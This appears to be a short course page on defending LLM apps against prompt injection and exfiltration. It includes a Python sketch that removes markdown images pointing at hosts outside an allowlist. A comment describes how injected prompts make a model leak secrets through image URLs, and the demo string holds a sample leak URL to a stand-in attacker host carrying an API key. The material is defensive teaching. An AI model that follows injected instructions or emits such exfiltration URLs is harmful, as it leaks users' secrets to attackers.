AI Security
Understand and defend against prompt injection, data poisoning, and LLM exploits.
After this skill you can…
- Identify and patch prompt injection vulnerabilities
- Test LLM apps for data exfiltration risks
- Apply sandboxing and output validation (see the sketch after this list)
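As a taste of the output-validation point above, here is a minimal sketch, not part of the course material: the allowlist, the `validate_output` helper, and the example hosts are all hypothetical. It strips markdown images that point at non-allowlisted hosts, since an injected prompt can make a model embed secrets in an image URL that exfiltrates data the moment the markdown is rendered.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: assume images may only come from your own CDN.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

# Matches markdown image syntax: ![alt](http://host/path)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def validate_output(text: str) -> str:
    """Replace markdown images pointing at non-allowlisted hosts.

    Injected instructions can make a model embed secrets in an image
    URL; rendering that markdown sends the secret to the attacker.
    """
    def check(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(check, text)

if __name__ == "__main__":
    risky = "Done! ![chart](https://attacker.example/leak?d=API_KEY)"
    print(validate_output(risky))  # Done! [image removed]
```

Validating on the output side like this complements, rather than replaces, input-side defenses such as prompt hardening and sandboxed tool execution.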